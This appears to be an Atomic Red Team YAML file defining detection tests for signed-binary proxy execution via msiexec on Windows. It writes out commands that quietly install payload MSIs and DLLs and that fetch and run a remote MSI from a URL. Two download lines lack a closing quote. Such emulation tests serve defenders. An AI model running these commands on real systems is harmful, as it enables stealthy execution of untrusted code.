Carrie Roberts
d4709021fb
* updating atomics count in README.md [ci skip] * wip * handle spaces in path * update readme * fix typo --------- Co-authored-by: publish bot <opensource@redcanary.com>
327 lines
14 KiB
YAML
327 lines
14 KiB
YAML
attack_technique: T1218.007
|
|
display_name: 'Signed Binary Proxy Execution: Msiexec'
|
|
atomic_tests:
|
|
- name: Msiexec.exe - Execute Local MSI file with embedded JScript
|
|
auto_generated_guid: a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04
|
|
description: |
|
|
Executes an MSI containing embedded JScript code using msiexec.exe
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
msi_payload:
|
|
description: MSI file to execute
|
|
type: path
|
|
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi
|
|
msi_exe:
|
|
description: MSIExec File Path
|
|
type: path
|
|
default: c:\windows\system32\msiexec.exe
|
|
action:
|
|
description: |
|
|
Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
|
|
type: string
|
|
default: i
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
The MSI file must exist on disk at specified location (#{msi_payload})
|
|
prereq_command: |
|
|
if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi" -OutFile "#{msi_payload}"
|
|
executor:
|
|
command: |
|
|
#{msi_exe} /q /#{action} "#{msi_payload}"
|
|
name: command_prompt
|
|
- name: Msiexec.exe - Execute Local MSI file with embedded VBScript
|
|
auto_generated_guid: 8d73c7b0-c2b1-4ac1-881a-4aa644f76064
|
|
description: |
|
|
Executes an MSI containing embedded VBScript code using msiexec.exe
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
msi_payload:
|
|
description: MSI file to execute
|
|
type: path
|
|
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi
|
|
msi_exe:
|
|
description: MSIExec File Path
|
|
type: path
|
|
default: c:\windows\system32\msiexec.exe
|
|
action:
|
|
description: |
|
|
Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
|
|
type: string
|
|
default: i
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
The MSI file must exist on disk at specified location (#{msi_payload})
|
|
prereq_command: |
|
|
if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_VBScript.msi" -OutFile "#{msi_payload}"
|
|
executor:
|
|
command: |
|
|
#{msi_exe} /q /#{action} "#{msi_payload}"
|
|
name: command_prompt
|
|
- name: Msiexec.exe - Execute Local MSI file with an embedded DLL
|
|
auto_generated_guid: 628fa796-76c5-44c3-93aa-b9d8214fd568
|
|
description: |
|
|
Executes an MSI containing an embedded DLL using msiexec.exe
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
msi_payload:
|
|
description: MSI file to execute
|
|
type: path
|
|
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi
|
|
msi_exe:
|
|
description: MSIExec File Path
|
|
type: path
|
|
default: c:\windows\system32\msiexec.exe
|
|
action:
|
|
description: |
|
|
Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
|
|
type: string
|
|
default: i
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
The MSI file must exist on disk at specified location (#{msi_payload})
|
|
prereq_command: |
|
|
if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_DLL.msi" -OutFile "#{msi_payload}"
|
|
executor:
|
|
command: |
|
|
#{msi_exe} /q /#{action} "#{msi_payload}"
|
|
name: command_prompt
|
|
- name: Msiexec.exe - Execute Local MSI file with an embedded EXE
|
|
auto_generated_guid: ed3fa08a-ca18-4009-973e-03d13014d0e8
|
|
description: |
|
|
Executes an MSI containing an embedded EXE using msiexec.exe
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
msi_payload:
|
|
description: MSI file to execute
|
|
type: path
|
|
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi
|
|
msi_exe:
|
|
description: MSIExec File Path
|
|
type: path
|
|
default: c:\windows\system32\msiexec.exe
|
|
action:
|
|
description: |
|
|
Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
|
|
type: string
|
|
default: i
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
The MSI file must exist on disk at specified location (#{msi_payload})
|
|
prereq_command: |
|
|
if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_EXE.msi" -OutFile "#{msi_payload}"
|
|
executor:
|
|
command: |
|
|
#{msi_exe} /q /#{action} "#{msi_payload}"
|
|
name: command_prompt
|
|
- name: WMI Win32_Product Class - Execute Local MSI file with embedded JScript
|
|
auto_generated_guid: 882082f0-27c6-4eec-a43c-9aa80bccdb30
|
|
description: |
|
|
Executes an MSI containing embedded JScript code using the WMI Win32_Product class
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
msi_payload:
|
|
description: MSI file to execute
|
|
type: path
|
|
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi
|
|
action:
|
|
description: |
|
|
Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types.
|
|
type: string
|
|
default: Install
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
The MSI file must exist on disk at specified location (#{msi_payload})
|
|
prereq_command: |
|
|
if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi" -OutFile "#{msi_payload}"
|
|
executor:
|
|
command: |
|
|
Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
|
|
name: powershell
|
|
- name: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript
|
|
auto_generated_guid: cf470d9a-58e7-43e5-b0d2-805dffc05576
|
|
description: |
|
|
Executes an MSI containing embedded VBScript code using the WMI Win32_Product class
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
msi_payload:
|
|
description: MSI file to execute
|
|
type: path
|
|
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi
|
|
action:
|
|
description: |
|
|
Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types.
|
|
type: string
|
|
default: Install
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
The MSI file must exist on disk at specified location (#{msi_payload})
|
|
prereq_command: |
|
|
if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_VBScript.msi" -OutFile "#{msi_payload}"
|
|
executor:
|
|
command: |
|
|
Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
|
|
name: powershell
|
|
- name: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL
|
|
auto_generated_guid: 32eb3861-30da-4993-897a-42737152f5f8
|
|
description: |
|
|
Executes an MSI containing an embedded DLL using the WMI Win32_Product class
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
msi_payload:
|
|
description: MSI file to execute
|
|
type: path
|
|
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi
|
|
action:
|
|
description: |
|
|
Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types.
|
|
type: string
|
|
default: Install
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
The MSI file must exist on disk at specified location (#{msi_payload})
|
|
prereq_command: |
|
|
if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_DLL.msi" -OutFile "#{msi_payload}"
|
|
executor:
|
|
command: |
|
|
Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
|
|
name: powershell
|
|
- name: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE
|
|
auto_generated_guid: 55080eb0-49ae-4f55-a440-4167b7974f79
|
|
description: |
|
|
Executes an MSI containing an embedded EXE using the WMI Win32_Product class
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
msi_payload:
|
|
description: MSI file to execute
|
|
type: path
|
|
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi
|
|
action:
|
|
description: |
|
|
Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types.
|
|
type: string
|
|
default: Install
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
The MSI file must exist on disk at specified location (#{msi_payload})
|
|
prereq_command: |
|
|
if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_EXE.msi" -OutFile "#{msi_payload}"
|
|
executor:
|
|
command: |
|
|
Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
|
|
name: powershell
|
|
- name: Msiexec.exe - Execute the DllRegisterServer function of a DLL
|
|
auto_generated_guid: 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d
|
|
description: |
|
|
Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
dll_payload:
|
|
description: DLL to execute that has an implemented DllRegisterServer function
|
|
type: path
|
|
default: PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll
|
|
msi_exe:
|
|
description: MSIExec File Path
|
|
type: path
|
|
default: c:\windows\system32\msiexec.exe
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
The DLL must exist on disk at specified location (#{dll_payload})
|
|
prereq_command: |
|
|
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/MSIRunner.dll -OutFile "#{dll_payload}"
|
|
executor:
|
|
command: |
|
|
#{msi_exe} /y "#{dll_payload}"
|
|
name: command_prompt
|
|
- name: Msiexec.exe - Execute the DllUnregisterServer function of a DLL
|
|
auto_generated_guid: ab09ec85-4955-4f9c-b8e0-6851baf4d47f
|
|
description: |
|
|
Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
dll_payload:
|
|
description: DLL to execute that has an implemented DllUnregisterServer function
|
|
type: path
|
|
default: PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll
|
|
msi_exe:
|
|
description: MSIExec File Path
|
|
type: path
|
|
default: c:\windows\system32\msiexec.exe
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
The DLL must exist on disk at specified location (#{dll_payload})
|
|
prereq_command: |
|
|
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/MSIRunner.dll -OutFile "#{dll_payload}"
|
|
executor:
|
|
command: |
|
|
#{msi_exe} /z "#{dll_payload}"
|
|
name: command_prompt
|
|
- name: Msiexec.exe - Execute Remote MSI file
|
|
auto_generated_guid: 44a4bedf-ffe3-452e-bee4-6925ab125662
|
|
description: |
|
|
Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI executes a built-in JScript payload that launches powershell.exe.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
msi_payload:
|
|
description: MSI file to execute
|
|
type: string
|
|
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi
|
|
msi_exe:
|
|
description: MSIExec File Path
|
|
type: path
|
|
default: c:\windows\system32\msiexec.exe
|
|
executor:
|
|
command: |
|
|
#{msi_exe} /q /i "#{msi_payload}"
|
|
name: command_prompt
|